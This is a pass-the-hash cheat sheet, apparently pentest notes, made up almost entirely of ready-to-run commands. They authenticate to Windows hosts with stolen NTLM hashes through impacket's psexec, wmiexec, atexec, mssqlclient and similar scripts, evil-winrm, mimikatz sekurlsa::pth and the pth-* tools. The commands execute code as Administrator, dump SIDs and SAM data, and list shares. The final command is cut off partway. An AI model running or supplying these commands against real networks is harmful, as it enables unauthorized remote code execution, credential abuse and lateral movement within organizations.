# Pass-the-hash

<https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/>

**PsExec**

```
proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -target-ip IP

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2
```

**WinRM**

```
evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b
```

**WMI**

```
python3 impacket/examples/wmiexec.py -k -no-pass [domain/]username@192.168.1.2
```

**SQL**

```
python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b
```

**Mimikatz**

```
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit
```

#### Other

```
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$

pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"

python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2

pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2

python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami

python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 i
```

